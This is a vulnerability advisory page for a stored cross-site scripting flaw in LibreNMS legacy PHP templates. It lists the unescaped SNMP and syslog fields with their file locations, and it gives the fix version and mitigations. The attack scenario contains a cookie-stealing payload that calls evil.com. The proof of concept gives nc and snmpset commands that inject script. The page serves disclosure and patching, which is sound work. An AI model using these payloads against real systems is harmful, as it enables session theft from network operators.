Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐘
🐘 Packagist
Not in CISA KEV
HIGH severity

LibreNMS — Stored XSS via SNMP/Syslog Data in Legacy TemplatesGHSA-7w8c-qgxg-m7jx

HIGHFix: librenms/librenms#19660

GHSA-7w8c-qgxg-m7jx is a high-severity (CVSS 7.1) Cross-site Scripting (XSS) vulnerability in librenms/librenms. A fix is available for librenms/librenms — see the affected versions and patch details below.

Also known asCVE-2026-84192
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Oct 8, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.

Exploitation and automatability from CISA’s SSVC triage for GHSA-7w8c-qgxg-m7jx.

EPSS Exploitation Probability

via FIRST.org ↗
0.3%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs24th percentile — riskier than 24% of all scored CVEsHighest risk

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

GHSA-7w8c-qgxg-m7jx by exploitation likelihood (EPSS) against impact (CVSS). Outside the shaded patch-first corner.

Where this sits among everything scored

Of 385,386 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Counts from FIRST.org, log-scaled.

Real-World Exposure

1 pkg affected
🐘librenms/librenms

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Summary

Multiple legacy PHP template files in LibreNMS directly output SNMP-sourced and syslog-sourced data into HTML without escaping. An attacker who controls a monitored network device (via compromised SNMP agent or syslog sender) can inject arbitrary JavaScript that executes when any authenticated LibreNMS user views the affected pages.

Vulnerable Code

Location 1: Syslog program field (clearest instance)

File: includes/html/print-syslog.inc.php:11,13

$syslog_output .= '<td><strong>' . $entry['program'] . ' : </strong> ' . htmlspecialchars((string) $entry['msg']) . '</td>';

The program field is output without htmlspecialchars() while the adjacent msg field IS properly escaped. The program value comes from syslog messages received from monitored devices.

Location 2: Alert details ifAlias (highest impact — main alerts page)

File: includes/html/functions.inc.php:607

$fault_detail .= $tmp_alerts['ifAlias'] . '; ';

The ifAlias (port description) comes from SNMP polling and is stored in the ports table. When a port-related alert fires, format_alert_details() renders it unescaped. Multiple other fields in this function are also unescaped: isisISAdjIPAddrAddress (line 598), service_desc/service_message (lines 656,658), bgpPeerDescr (line 672), mempool_descr (line 686), app_type (line 709).

Location 3: Health pages — mempool_descr, storage_descr, sensor_descr

File: includes/html/pages/device/health/mempool.inc.php:38

echo "<h3 class='panel-title'>{$mempool->mempool_descr} ...";

File: includes/html/pages/device/health/storage.inc.php:27

echo "<h3 class='panel-title'>{$drive['storage_descr']} ...";

File: includes/html/pages/device/health/sensors.inc.php:29

echo "<h3 class='panel-title'>$sensor_descr ...";

All three health page templates output SNMP-polled descriptions directly into <h3> tags without escaping.

Location 4: Pseudowires ifAlias

File: includes/html/pages/pseudowires.inc.php:76

echo "<tr ...><td colspan=2>" . $pw_a['ifAlias'] . '</td><td colspan=2>' . $pw_b['ifAlias'] . '</td></tr>';

Location 5: VRF page ifAlias

File: includes/html/pages/routing/vrf.inc.php:165

echo "<div style='font-size: 9px;'>" . substr((string) short_port_descr($port['ifAlias']), 0, 22) . '</div>';

Data Flow

Attacker-controlled SNMP device/syslog source
  → SNMP polling stores ifAlias/mempool_descr/etc in DB (no sanitization on write)
  → OR syslog receiver stores program field in syslog table
  → Authenticated user views alerts/health/syslog page
  → Legacy PHP template echoes raw value into HTML
  → XSS executes in victim's browser session

Attack Scenario

  1. Attacker compromises or controls a network device monitored by LibreNMS
  2. Attacker configures the device's SNMP interface description (ifAlias) to: <img src=x onerror="fetch('https://evil.com/'+document.cookie)">
  3. LibreNMS polls the device via SNMP and stores the malicious ifAlias in the ports table
  4. When any alert fires for this port, the XSS payload executes for every authenticated user viewing the alerts page
  5. Alternatively: attacker sends syslog messages with XSS in the program field, targeting the syslog viewer page

PoC

Syslog vector (simplest)

# Send syslog message with XSS in program field
# Assuming LibreNMS syslog receiver is at 10.0.0.1:514
echo '<14>Mar 20 12:00:00 rogue-device <img/src=x onerror=alert(document.domain)>: test message' | nc -u 10.0.0.1 514

SNMP vector

# On attacker-controlled SNMP device, set interface description:
# snmpset -v2c -c private localhost IF-MIB::ifAlias.1 s '<img src=x onerror=alert(document.cookie)>'
# LibreNMS will poll this during next discovery/polling cycle

Contrast with Properly Escaped Code

Newer Blade templates and some legacy code properly escape SNMP data:

  • includes/html/dev-overview-data.inc.php uses Clean::html() for sysDescr, sysName, hardware
  • app/Http/Controllers/Device/Tabs/PortsController.php uses htmlentities() on ifAlias
  • app/Http/Controllers/Table/EventlogController.php:97 uses htmlspecialchars() on message
  • All Blade templates use {{ }} auto-escaping

The vulnerability exists specifically in the legacy includes/html/ PHP files that have not been migrated to Blade.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐘Packagistlibrenms/librenmsall versions26.5.0composer require librenms/librenms:^26.5.0

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for librenms/librenms, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update librenms/librenms to 26.5.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7w8c-qgxg-m7jx is resolved across your whole dependency graph.

  3. Workarounds

    Escape or sanitise the affected output on the server side rather than relying on client-side filtering, and add a Content-Security-Policy that blocks inline script execution so injected markup cannot run even if it reaches the page.

Frequently Asked Questions

## Summary Multiple legacy PHP template files in LibreNMS directly output SNMP-sourced and syslog-sourced data into HTML without escaping. An attacker who controls a monitored network device (via compromised SNMP agent or syslog sender) can inject arbitrary JavaScript that executes when any authenticated LibreNMS user views the affected pages. ## Vulnerable Code ### Location 1: Syslog `program` field (clearest instance) **File:** `includes/html/print-syslog.inc.php:11,13` ```php $syslog_output .= '<td><strong>' . $entry['program'] . ' : </strong> ' . htmlspecialchars((string) $entry['msg'
O3 Security · Impact-Aware SCA

Is GHSA-7w8c-qgxg-m7jx in your dependencies?

Find it across Packagist, including transitive dependencies.

LibreNMS — Stored XSS via SNMP/Syslog Data in Legacy…